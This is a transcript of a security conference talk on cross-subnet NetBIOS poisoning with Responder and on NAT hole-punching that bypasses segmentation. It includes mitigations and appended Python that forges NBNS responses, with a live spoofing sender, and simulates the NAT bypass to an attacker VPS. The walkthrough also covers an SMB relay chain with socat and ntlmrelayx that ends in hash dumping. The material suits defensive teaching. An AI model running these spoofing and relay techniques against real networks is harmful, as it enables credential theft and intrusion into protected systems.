
Discover If Your Network Segmentation Is Secure, Or NAT - Anthony Holt

BSides Newcastle | 32:57 | 150 views | Published 2025-02

Thank you all for coming. My name's Anthony. I have been in the IT industry for about 20 years: I started off as an IT manager for about 10 years and then decided to join the dark side and become a penetration tester about 10 years ago. I'm really happy to be here in Newcastle with you guys at BSides Newcastle, as this is where I'm from; I live about 20 minutes away from here, and I set up a company this year called Pentest Consultants, which is also based in Newcastle. So what we're looking to cover today is a little bit about a tool called Responder: what it is, how it works,

how an attacker could take advantage of it, what this means for you in your networks, and then an example of it being exploited. Then the same thing for network address translation. Hopefully you'll all be, not experts by the end of this slide deck, but we'll talk about what it is, how it works, how it can be abused by attackers and ultimately how it can undermine your network segmentation. So Responder then looks like this. It's a Python tool designed to poison network name resolution, things like NetBIOS name resolution and Link-Local Multicast Name Resolution. Hands up if you've ever heard of or used Responder in this room, guys. Hooray, that's good. Now put your

hands back down, and hands up again if you've ever used Responder to poison not the network you're connected to but a different network. Not so many; that's good. And again, with poisoning networks across the internet, or hosts across the internet: you can kind of do that with Responder too, and we'll get into how that works. So for those of you who don't know, the way that Responder ultimately works is: imagine you've got a network with a couple of clients, a DNS server and a file server. Machines don't really use host names, things like google.com and fileprint1; they like to work with IP addresses, and so we have a name system

which converts those names from the host name into an IP address. The way it usually works is somebody will type \\fileprint1 into their Run box, and as soon as they hit the backslash, or if they click the OK button, what your machine does is it shouts out to the DNS server and says, "Hey, where's fileprint1?" and the DNS server says, "It's there, it's 102.05," and that's great. But what happens when that falls down? Say you're like me and you sometimes mistype things: you hit fileprint12 because you've caught the 2 key at the same time as the 1 key when you've pressed backslash. What happens is your machine

broadcasts to the DNS server, or sends a message to the DNS server, and says, "Where's fileprint12?" and the DNS server has no answer. And so what happens normally on most networks, if you haven't secured or made your network more hardened, is your machine will fall back to broadcast name resolution protocols, things like NetBIOS name resolution and Link-Local Multicast Name Resolution. What it does is effectively it shouts into the network, "Is anyone fileprint12?" Now what Responder does is it replies to these messages and says, "Yep, that's me, I'm totally fileprint12, please send me your credentials," and effectively that's what Responder does. Now I wanted to talk

about how this would look in a real network. There's quite a lot going on on this, and this is going to help us when talking about network address translation down the road, so there's a lot to go through, but I'll try and get you oriented. This is a high-level diagram for a client's network; we've called them Example Limited. Over here on the left you've got the client network, where we're imagining that there's an attacker that's plugged a device in, or they've compromised a machine inside of that network, and they're sat alongside other clients inside of that network. Separately we've got, in what was green

and is now coming out yellow, a servers network which contains things like your domain controller, maybe your card data server, maybe your IT jump box, that kind of thing. We've also got at the top a firewall which allows traffic between the networks to some extent and also allows people to connect out to the internet. For those of you who don't know what a firewall is, that's fine, I'll explain the main thing you need to know. Ultimately it doesn't matter whether you've got a BT Home Hub or a Virgin Media business firewall, whether you've got a Cisco ASA or a pair of ASAs, a SonicWall UTM or some kind

of, you know, virtual next-generation AI-powered newfangled thing that they've managed to tell you you absolutely need. They all ultimately are going to be doing a bunch of stuff, but two of the things that they will be doing, hopefully, are something called access control lists, which is which machines are allowed to talk to which machines inside of your network, and they'll also do a thing called network address translation, which we'll talk about in a bit. So going back to our Example Limited network, how would Responder work inside of this situation, inside of this network? So imagine you've got a client, and the client is saying, "Is anyone here fileprint12?" It's broadcasting to the

network. You've got your attacker laptop there; it's running Responder. What it's going to do is say, "That's absolutely me, please connect to me," and when your client connects, the attacker will probably receive a Kerberos or NTLM credential which they can potentially crack and reuse to attack other parts of your network. Hopefully some of you here today may understand that and know that. But what happens if we're not interested in the clients that we're sat alongside? What if the juicy creds are over there on the IT bastion, or what if we need credentials for the card data environment, which is on a separate network? Or, you know, sometimes, although

we do ask for organisations to place us into a representative network, you may have been on a pen test before where you're literally the only one in there; you've been put on your own VLAN and you've got nothing really to monitor and poison. What can we do about that? So in that situation, what you can do is spoof NetBIOS name traffic. And to talk about that: what if I told you that Responder can work across subnets? So how does that exactly work, and how does Responder work? Well, if we bring up Wireshark, which is a packet capture tool, and have a look at how it works under the hood, how name resolution works

under the hood, effectively when a client tries to look for a host name like fileprint12, it will have a connection coming from its IP and it will send it to its broadcast name resolution network address. It always uses the same port: it always uses UDP 137 for both the source and the destination. And the key thing to remember, or to take away, is that it uses something called a transaction ID. Now, a transaction ID is a number between 0 and 65,535, and effectively when a response comes back to the host, what it's looking for is to find out whether that transaction ID matches. If that transaction ID matches, it sees it as

being a legitimate response to its request and it will accept the response. So the attack is old and has been around a long time, but I don't feel like a lot of pentesters are taking advantage of it or using it. All the way back in 2016 you had an article released by Stephen Breen from Foxglove Security, and in his write-up of the vulnerability, which happened to be a local privilege escalation vulnerability, he explained that as well as the local privilege escalation vulnerability, called Hot Potato, which you might have heard of, there's also scope for a new type of attack, which is the idea of just brute-forcing that transaction ID. If we

send everything from 0 to 65,535 to a client continuously, then we can poison the name resolution even if we're throwing those packets across networks, and he theorised that you could probably do this across the internet if it was fast. Now, he actually released a tool on GitHub which allows you to do this, which is called Responder with spoof. Not sure how many people downloaded this, but if you have done it and you've used it, you'll probably find that what it will do is cause a denial of service attack on your own network. The thing is, what it does is you put in an IP address that you're targeting and you put in your IP address,

which is the one you're trying to spoof, and it will go through from 0 to 65,535 and it will just repeat that, and repeat that, and repeat that, and effectively it will fill the network with UDP traffic, which is not good. So it has, ultimately, a problem. Now the bit of code that's really blurry up there, which you might not be able to make out: what that does is, as mentioned, it loops around all 65,535, and then it tries again, and it tries again, and it tries again. Now I'm not very good at making Python scripts more efficient, but I do find it quite easy, and a lot of people do, to

make something less efficient, make it slower. So if we just take the tool that Stephen Breen released and we introduce one line of code, we can introduce a sleep into the function that's used to generate those packets, so it will still send all 65,000 but it will do it a little bit slower, and it'll send about one meg per second instead of your full bandwidth being thrown across the network causing problems. So that's great. So what that means for you: it means that if a machine is compromised on your network, or there's an attacker that's plugged his device in, they're able to then spoof NetBIOS name resolution traffic across those networks. So it introduces more and

additional targets from a pentester's perspective; it opens up the ability to spoof those machines that ordinarily you wouldn't ever be seeing any traffic for. Press next. So the way the attack would work is, once you've added that time.sleep into the NetBIOS NBT-spam .py script, you run the command like this: you specify the interface that you want to use, you specify the target, the machine that you're going after, you specify your IP, and then you specify the name that you're wanting to spoof, and you mash the Go key. What happens is it generates a lot of traffic, but not as much as before the sleep was introduced, and it throws them across the network.

Every single packet has a different transaction ID. Eventually, when the client does try to look up WPAD, the next time they open their browser or the antivirus checks for updates or something like that, it's going to generate a NetBIOS request for WPAD. It does this three times, one second apart, and if your packets hit at any point during those three seconds it will poison the resolution and you'll hopefully get something like this come back. So at the top I've got the spoofer, as I've called it, running, which is sending the spoof messages over at 172.17.0.100. I've got my Responder running on 10.20.30, a completely different network,

but yet the credentials get thrown at me for that machine, which is great. One of the reasons we ask our users to make sure that they've got good, strong, secure passwords is to protect against offline brute-force attacks, so you can then try and crack that to reveal the password for the user, which is "ordering1986" this year, which is great. So how do we fix it? Well, a lot of the industry has been messaging for a long time saying that you need to disable broadcast name resolution protocols, things like Link-Local Multicast Name Resolution and NetBIOS name resolution. You can push these changes through PowerShell and Group Policy. More recently a

lot of people are onboarding with Intune; you can potentially create Intune policies to push a PowerShell script that will do this for you. But yeah, turn it off, basically, and apply the principle of least privilege to your firewall rules, so if your users aren't needing to send UDP 137 between networks, don't allow that to happen, effectively. So in summary: the traffic can be poisoned across subnets, name resolution should be off, and you should ask your teams whether they've turned it off. And for us as testers, understanding how tools work and what they're doing in the background sometimes opens doors, so it's important to make sure you take the time

to learn what's going on under the hood. So some people might say, "That's fine, we've got firewalls; anything from this sketchy network that we don't trust going towards our shiny trusted network, we're going to just block and drop all of that." So I wanted to talk to you today also about network address translation and how you can potentially abuse that to pivot from one network to another. So NAT, what is NAT? Nat is my next-door neighbour, but alongside that it stands for network address translation, and specifically I'm talking about NAT overload here: the idea of using one public IP address and having many clients behind

that IP address. So I want to hopefully bring you all on board and bring you up to speed about how that works from a high level, so even if you're not technical, hopefully you should be able to follow this along. Imagine you have one office, and inside that office you have one address for your office, but you want to send parcels out for a lot of different people inside the organisation. So imagine we've got a red user up here on the red network, we've got a green user down here on a completely separate green network, and they both have packages that they would like to send out towards the internet. OK, now that's

a lot of packages to keep track of, so we're going to need something to do that, and what happens is your reception desk, or your firewall, produces a network address translation table, or whiteboard, OK? Then what happens is, when a message gets sent by a user, the firewall receiving the package logs it within its network address translation table and then sends it out the door towards the internet, to wherever it's going. When we receive another package coming in, we make another network address translation table entry and we again send that message out the door. Now, when a package comes back from the internet, we've got a decision to make: we need to decide where

this package is going, and what we do is we look at our network address translation table and we see, OK, well, they match, that goes to green, and we send the package to the green user on the green network, which is great. So how do we attack it, and where does it fall down, and how can it undermine our segmentation between our networks? Now, again, a few years ago, in 2021, I sat in the hotel room of a Premier Inn on an IT Health Check doing some research into some new attacks that were out, and this new thing hit my inbox called FragAttacks, which was a wireless network exploit which allowed you to inject packets,

single packets, into wireless networks even if you didn't know what the WPA3 password was, and that was very scary. But it was implementation-specific, it depended on the wireless access point that you were using, and it was patchable, and all the rest of it. What the tester did, a guy called Mathy Vanhoef, he created a YouTube video where he explained how his attack worked, and he did two things. He injected a single packet onto the network which switched on a light: he explained, if your organisation has one of those Internet of Things smart plugs, sometimes they don't have authentication on them, and he was able to demonstrate, hey, what

if we inject a single packet onto the network and it's the control packet to switch the light on? He did that, which was great. But the next thing he did, which I found really interesting, was he sent a single packet onto the network which went out through the network address translation firewall, and he then connected back into the network to exploit BlueKeep, which was an RDP vulnerability which was around at the time, very common at the time. Now this freaked me out, because I'd seen some research in the past about how you can punch a hole in UDP: you could maybe get somebody to browse your website and somehow then get access to their machine

directly. But this kind of changed the way I thought about network address translation, when I realised, hang on, he's exploited TCP there. That's really interesting, because that becomes, in hacker terms, much more useful. So what this means, if you imagine back to our network address translation simulation: if you're a red user on the red network and you create a package going to a machine that you control, but you spoof that packet... so yeah, I mean, it's great having a wireless network vulnerability that affects specific implementations of specific wireless access points, super cool stuff, but break it down even more simply: if you imagine you're already on the network, spoof a packet for the network that you're trying to get to, and send that to

the firewall. The firewall will create a network address translation entry saying anything coming from this hacker.com goes to the green network. That will then get sent out to the internet. When you remote into this machine on the internet and control it and connect back, where's the package going to go? It's going to get sent straight back to the green network, which is bad, basically. You end up with command and control being sent and received between the green network, which has never seen the machine before, and the attacker-controlled host on the internet, which is a very scary thought, even if your organisation has a firewall that says the red network is not allowed to talk to the green network. Now the attacker is talking to the

green network through the link that's been created, which is really bad. So how does this look on our Example Limited, and how would this look on a real network? What happens is, we need a network address translation table, created up in the corner there, and we sit on our 10.20.30.123 address, which we're not interested in, but we spoof a packet from 172.17.0.102, so we're spoofing a packet from this card data controller over here. We choose a destination, which is an IP that we control, and we pick any port, and it can literally be any port: so if I'm targeting a domain controller I might pick DNS. But yeah, we pick a port,

and that goes to the firewall, and the firewall creates an entry in its network address translation table that says, hey, if I see any packets coming back for port 8080 on that internet IP, it needs to go back to this machine over here. The message gets sent out and goes over to the attacker. The attacker then sees the public IP for the network that's connecting out and reaching out, and it sees a random port that's been generated by the network address translation function of the firewall, and it knows that it's connecting on port 8080. So what it needs to do is just do the reverse of this: when it sends its message back, it picks a source of itself,

it picks as the source the port that it was coming in on, and it targets the public IP belonging to this network and the port. Because everything matches and marries up when it comes back to the firewall, it follows its rule in its network address translation table and it throws the packet over at the card data machine, which is really, really bad. Effectively you have communication from an internet host directly to one of your internal hosts, which is a very scary concept. Now, you may have a rule that says we do not allow things on the internet to connect directly to our card data server, that's just madness, we'd never allow that. But that's not

what the firewall saw. What the firewall saw was that your card data server attempted to make an outbound connection towards the internet. If you've got a firewall rule that allows that, then it's going to pass its access control check and it's just going to let it through. So we've got command and control between these two machines. Going back to what really freaked me out when I first saw this attack and kind of understood what was going on, I thought, well, what if this isn't clients and servers? What if this is a client range and a card data environment? What if this is a client network and operational technology? If you've got

some kind of control system, that's going to be a nightmare. Students and staff, if you're in education. Or the one that really worried me the most: guest Wi-Fi internet and your internal network. If you've got the same firewall used between these two systems, yes, you may have rules that say guest Wi-Fi is not allowed to talk to our internal network, but you may be falling foul of this and it's going to be causing you problems. So I thought, let's give an example for the testers in the room, and this is going to get a little bit more complicated now, but we're going to be talking about attacking the SMB service. So SMB is what Windows uses for file sharing. It

can be used to execute commands remotely on machines; it's a very interesting service, and it's a TCP service, and we have tools already that work with the service. So I thought, let's try and see how we can exploit that and let's see what the problems are going to be when we try that. So I created a little Python script using Scapy that generated packets. All it does is: I put in an IP address that I want to be targeting on the network, and I put in my IP address for my VPS server on the internet, and I put port 8080 in, or whatever port I want to use, and I run

the Python script, and what it does is it just generates that one packet and places it on the network. What happens is that that packet ends up appearing from the client's public IP and it goes to my IP address out on the internet. The source port is random, picked randomly by the firewall as it creates its NAT entry, and the destination port is the port that I'm expecting, which is 8080. Now the first problem that I'm going to hit is that I don't have a service running on port 8080 on my machine at the moment, so my machine is going to create a reset packet, and when that reset packet is sent back to the firewall it's

going to decide, OK, we're not doing anything with this connection, we're just going to bin it off, and it'll close it down. So problem one, or solution one for problem one: use iptables or something to drop those reset packets; don't let them leave your machine. OK, that's that fixed. Right, next step. So we produce the packet and it goes out from the client to my control machine on the internet, ports changed, that's fine, but I need a way of sending a message back, and the message that I send back has to have a source port of whatever that firewall came up with. OK? If it doesn't, it's not going to match that NAT rule and it's just going

to get dropped by the firewall. So you'll find that when you use tools like CrackMapExec or NetExec, they do not have the ability to set a source port, OK? You check the help, you grep for "port", there's no option to say I want all this traffic to come from port 47637. So solution two is to stick something in the middle of the tool you're trying to use, CME, and your machine which is about to create that packet and send the connection back. So we use socat to do that. With socat we can create a listener on our machine, we can set it to our local IP address on the virtual private server that we're

controlling, and we can then specify the target's public IP, the port that we know we need to use, and we can say that the source port needs to be port 8080 there. So we're targeting port 47637 as a destination, but the source port needs to match the one that the client tried to hit. That's great; you'll do that, and then you'll find that NetExec still doesn't work. The problem is that NetExec is quite yappy, or CrackMapExec if you've ever used that: it creates multiple connections, OK? It does one to check whether SMB signing is switched on, it does a separate one to decide whether it's using SMB version 2

or SMB version 3 or whether it's using SMB version 1. It basically produces a number of connections outbound, and unfortunately for the tester, or the attacker, you only have the one opportunity: you've created your spoof packet, you get to reply to that spoof packet, and as soon as that communication's dropped and finished, you then need to spoof more packets. So you can absolutely spoof more packets, that can be a thing, but a solution to this with SMB would be to use something like ntlmrelayx with its SOCKS mode. If you've not seen this, ntlmrelayx has a really handy ability to create a single connection using SMB and create a SOCKS

proxy which you can then loop into and send your multiple connections. So we get ntlmrelayx started and we tell it to listen on localhost, and we target our socat port, the connection that we set up earlier. We then authenticate against the SMB service that we created: so we set this up on our VPS and forward 445, and then we authenticate against that 445. If you follow those steps end to end, effectively you'll end up with something like this saying, hey, give me the password; you put the password in and you'll receive a message saying the attack succeeded and a SOCKS tunnel is now created. You can then send multiple requests through that SOCKS port to then

do what it is that you want to do against that SMB service. So in this case, as an example, I've authenticated, I've found I'm an admin, I've then run a command, I've found out that I'm NT AUTHORITY\SYSTEM, and then I've dumped some hashes, just to demonstrate that I'm doing multiple things. Long story short, if you're trying to do this, remember that you'll only have the one opportunity, so you either need to create something that sends multiple spoofs and you hop off the back of that, or you need to create some kind of middleware, or use something like ntlmrelayx to sit in the middle. So from the machine's perspective, the server's perspective, this looks really

freaky. If you imagine you're a domain controller and you're just sat there minding your own business, protected in the internal network, all of a sudden a wild packet appears that says, I promise you, the external IP for the attacker, OK? So this SMB service just kind of appears out of nowhere and the connection then just carries on and works, up until that connection's been dropped. So what does this mean, and what's the impact to you as an organisation? What I'm trying to put across here is: instead of connecting directly from that untrusted network into that trusted network, if you're happy to leave the network and

go out to the internet and come back, you can absolutely bypass network segmentation and access those protected internal networks. This could be combined with the attack that I mentioned earlier against the NetBIOS name resolution service, so there's nothing stopping you doing this multiple times: you could land in the client network, you could spoof UDP and try and get something to connect back to you, poison the name resolution using NetBIOS name resolution, and then once you've got the credentials you can then spoof TCP and make your way back in that way, and combine the two, which is a very scary thought. So how do we fix it? Now, if you log into your firewall you

will likely have something called anti-spoofing, or you'll have something called unicast reverse path forwarding, which is a very clever solution. What unicast reverse path forwarding does is, for every packet that arrives on an interface, the firewall looks at its routing table and it decides, could I reach that from here? And if it can't reach it from there, it just drops the packet, which is great. Now, when I do firewall reviews for organisations I find that this is switched on very often; however, for most organisations, and possibly just by default out of the box, it's only switched on for the external internet interface. You guys need to enable this for your internal network interfaces, or at least for that guest

wireless network interface and that kind of thing. The other thing that you can do to solve the problem is you can add even more firewalls into the solution. So if you had a firewall here on the edge of the network that you're trying to protect, this firewall here is going to have its own network address translation table, and so me spoofing and creating a network address translation entry on here, when that packet comes back, this firewall is not going to have heard of that connection before and it's not going to let it through. So that would be a good way to resolve the issue. Another thing I'd consider as well is to take a look at your, kind of, what I

call your defence in depth. So install more submarines and build more underwater castles, whatever phrase you want to use, but look at your wider picture. You know, do your users have good, strong passwords to make it hard for the attackers to crack those passwords in an offline attack? Have you got specific, restricted outbound network firewall rules that restrict the ability for that card data server to go out to the internet in the first place? Those will ultimately help. So in summary: network address translation can kind of undermine any expected network segmentation controls; attacks against your broadcast name resolution are still valid today; Responder has been around for a very long time and

I still use it in penetration tests that I'm doing nowadays, more recently, but I'll be doing the spoofing thing more than the name resolution thing. And as testers, it's important really for us, when we receive these kinds of alerts saying hey, there's a new tool, or hey, there's a new attack against specific wireless implementations, it's always good to spend a little bit of time reading about how those attacks work and what the tools are actually doing under the hood, because that can sometimes make you imagine or think about a different way, or a different method, that you're able to

implement to abuse that vulnerability that's being described. If you guys have any kind of questions... I don't know how much time we've got now, because I know that hit about 28 minutes when I've been rehearsing it, but please catch me outside or drop me an email or a LinkedIn message or something like that. Yeah, have we got any time for any questions? OK, yeah, so we're good. That's it, that's [Applause]
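The NetBIOS transaction-ID brute force described in the first half of the talk, as an added example written for this page; it is not code from the talk, from Responder, or from Stephen Breen's spoofing fork. It builds the positive name-query response a client accepts, shows why a client on another subnet takes the answer when one of 65,536 forged packets happens to carry the transaction ID it is waiting for, and works out how long a rate-limited sweep takes. The response flags 0x8500, the TTL of 165, the 0x20 name suffix, the 42-byte Ethernet/IP/UDP overhead and the 10.20.30.x addresses are assumptions made for the example; only `send_sweep` touches a real socket, and it is not exercised by the offline demonstration.

```python
"""NBNS (NetBIOS Name Service, UDP/137) positive name-query response forgery and the
transaction-ID brute force that lets a poisoned answer land on a host in another subnet."""
import socket
import struct
import time

NBNS_PORT = 137
NBNS_FLAGS_POSITIVE_RESPONSE = 0x8500   # assumed: response + AA + RD, as poisoning tools send
NB_RECORD_TYPE = 0x0020


def encode_netbios_name(name: str, suffix: int = 0x20) -> bytes:
    """RFC 1001 first-level encoding: 15 space-padded chars + suffix byte, each nibble + 'A'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(out) + b"\x00"        # label length 32, encoded name, root label


def build_nbns_response(txid: int, name: str, ip: str, ttl: int = 165) -> bytes:
    """Forge a positive name-query response claiming `name` lives at `ip` for transaction `txid`."""
    header = struct.pack(">HHHHHH", txid, NBNS_FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    rr = encode_netbios_name(name) + struct.pack(">HHIH", NB_RECORD_TYPE, 1, ttl, 6)
    rdata = struct.pack(">H", 0) + socket.inet_aton(ip)  # NB_FLAGS (B-node, unique) + address
    return header + rr + rdata


def parse_nbns_response(pkt: bytes) -> dict:
    """Decode the fields a client checks before it believes an answer."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or ancount != 1 or pkt[12] != 0x20:
        raise ValueError("not a single-answer NBNS response")
    enc = pkt[13:45]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[46:56])
    if rtype != NB_RECORD_TYPE or rdlen != 6:
        raise ValueError("not an NB record")
    return {"txid": txid, "name": raw[:15].decode("ascii").rstrip(" "), "suffix": raw[15],
            "ttl": ttl, "ip": socket.inet_ntoa(pkt[58:62])}


class NbnsClient:
    """Models the victim: an answer is accepted only if its transaction ID matches an
    outstanding query for the same name. There is no other authentication."""

    def __init__(self):
        self.pending = {}          # txid -> name being resolved

    def query(self, name: str, txid: int) -> None:
        self.pending[txid] = name.upper()

    def receive(self, pkt: bytes):
        answer = parse_nbns_response(pkt)
        if self.pending.get(answer["txid"]) != answer["name"]:
            return None            # txid mismatch is silently ignored, which is why brute force works
        del self.pending[answer["txid"]]
        return answer["ip"]


def brute_force_txids(client: NbnsClient, name: str, spoof_ip: str):
    """Sweep every 16-bit transaction ID against the victim; returns (txid, ip) on success."""
    for txid in range(0x10000):
        accepted = client.receive(build_nbns_response(txid, name, spoof_ip))
        if accepted:
            return txid, accepted
    return None


def sweep_seconds(bytes_per_second: int, frame_overhead: int = 42) -> float:
    """Seconds for one full 0..65535 sweep at a send rate (assumed Ethernet+IP+UDP overhead)."""
    frame = len(build_nbns_response(0, "WPAD", "10.20.30.1")) + frame_overhead
    return 0x10000 * frame / bytes_per_second


def send_sweep(target_ip: str, name: str, spoof_ip: str, bytes_per_second: int = 1_000_000):
    """Real sender, not exercised offline: binding source port 137 needs CAP_NET_BIND_SERVICE."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("", NBNS_PORT))
    delay = sweep_seconds(bytes_per_second) / 0x10000   # the one-line sleep from the talk
    for txid in range(0x10000):
        sock.sendto(build_nbns_response(txid, name, spoof_ip), (target_ip, NBNS_PORT))
        time.sleep(delay)
```

At roughly one megabyte per second a full sweep of all transaction IDs takes under seven seconds, so it comfortably covers the three one-second retries a Windows client makes for a name like WPAD; the `NbnsClient` model also makes the defensive point visible: nothing but the 16-bit transaction ID and the name stand between a forged unicast answer and a poisoned lookup.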
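The NAT overload hole punch from the second half of the talk, as an added example written for this page rather than the speaker's Scapy script or any firewall's real code. A toy firewall keeps a NAT table keyed on (public port, remote address, remote port) and an optional uRPF check per internal interface; the scenario spoofs a packet from the card data server on the green network while really sitting on the red network, then has the internet host reply the way socat's fixed source port allows, and also reproduces the two failure modes the talk walks through (a RST from the VPS tearing the mapping down, and a reply from the wrong source port). The public address 203.0.113.10 and the VPS address 198.51.100.7 are assumed; the 10.20.30.0/24 and 172.17.0.0/24 networks follow the talk's diagram.

```python
"""Toy model of NAT overload (PAT) showing how a spoofed outbound packet punches a hole
back into a segmented network, and how uRPF on the internal interfaces stops it."""
import ipaddress
import random
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    flags: str = "S"      # simplified TCP flags: "S" SYN, "A" ACK, "R" RST
    payload: str = ""


class NatFirewall:
    """NAT overload table plus an optional uRPF check on named internal interfaces."""

    def __init__(self, public_ip, interfaces, urpf_interfaces=(), seed=0):
        self.public_ip = public_ip
        self.routes = {name: ipaddress.ip_network(cidr) for name, cidr in interfaces.items()}
        self.urpf = set(urpf_interfaces)
        self.table = {}     # (public_port, remote_ip, remote_port) -> (internal_ip, internal_port)
        self.rng = random.Random(seed)
        self.log = []

    def route_for(self, ip):
        """Which internal interface the routing table says this address lives behind."""
        addr = ipaddress.ip_address(ip)
        return next((n for n, net in self.routes.items() if addr in net), None)

    def outbound(self, ingress, pkt):
        """Packet arriving on an internal interface, heading for the internet."""
        if ingress in self.urpf and self.route_for(pkt.src_ip) != ingress:
            self.log.append(f"uRPF drop on {ingress}: {pkt.src_ip} is not reachable via {ingress}")
            return None
        # The access-control check only sees "internal host -> internet", which a permissive
        # outbound rule allows no matter which interface the packet really came in on.
        pub_port = self.rng.randint(49152, 65535)
        while any(k[0] == pub_port for k in self.table):
            pub_port = self.rng.randint(49152, 65535)
        self.table[(pub_port, pkt.dst_ip, pkt.dst_port)] = (pkt.src_ip, pkt.src_port)
        self.log.append(f"NAT {pkt.src_ip}:{pkt.src_port} -> {self.public_ip}:{pub_port} "
                        f"for {pkt.dst_ip}:{pkt.dst_port}")
        return replace(pkt, src_ip=self.public_ip, src_port=pub_port)

    def inbound(self, pkt):
        """Packet arriving from the internet; delivered only if it reverses an existing mapping."""
        key = (pkt.dst_port, pkt.src_ip, pkt.src_port)
        if key not in self.table:
            self.log.append(f"drop unsolicited {pkt.src_ip}:{pkt.src_port} -> :{pkt.dst_port}")
            return None
        int_ip, int_port = self.table[key]
        if "R" in pkt.flags:            # a RST from the attacker's host tears the mapping down
            del self.table[key]
            self.log.append(f"RST closed mapping for {int_ip}:{int_port}")
            return None
        return self.route_for(int_ip), replace(pkt, dst_ip=int_ip, dst_port=int_port)


def hole_punch(urpf_on_internal=False, vps_sends_rst=False, reply_src_port=8080):
    """Attacker on 'red' spoofs a SYN from the card data server on 'green' to its VPS, then the
    VPS connects back. Returns (interface, packet) where the reply landed, or None if dropped."""
    fw = NatFirewall("203.0.113.10",                       # assumed public address
                     {"red": "10.20.30.0/24", "green": "172.17.0.0/24"},
                     urpf_interfaces=("red", "green") if urpf_on_internal else (),
                     seed=7)
    vps = "198.51.100.7"                                   # assumed attacker-controlled host
    spoofed = Packet("172.17.0.102", 50123, vps, 8080)     # source forged as the green server
    seen_by_vps = fw.outbound("red", spoofed)              # the attacker really sits on red
    if seen_by_vps is None:
        return None
    if vps_sends_rst:                                      # nothing listening on 8080: kernel RSTs
        fw.inbound(Packet(vps, 8080, seen_by_vps.src_ip, seen_by_vps.src_port, flags="R"))
    # Reverse exactly what the VPS saw; only a matching source port hits the NAT entry
    reply = Packet(vps, reply_src_port, seen_by_vps.src_ip, seen_by_vps.src_port,
                   flags="SA", payload="SMB negotiate")
    return fw.inbound(reply)
```

Running `hole_punch()` delivers the VPS's packet onto the green network at 172.17.0.102:50123 even though the attacker never crossed the red/green boundary; `hole_punch(urpf_on_internal=True)` shows the uRPF fix the talk recommends, where the spoofed packet is dropped at the red interface before any mapping is created, and the `vps_sends_rst` and `reply_src_port` arguments reproduce why the iptables RST drop and socat's fixed source port are needed on the attacker's side.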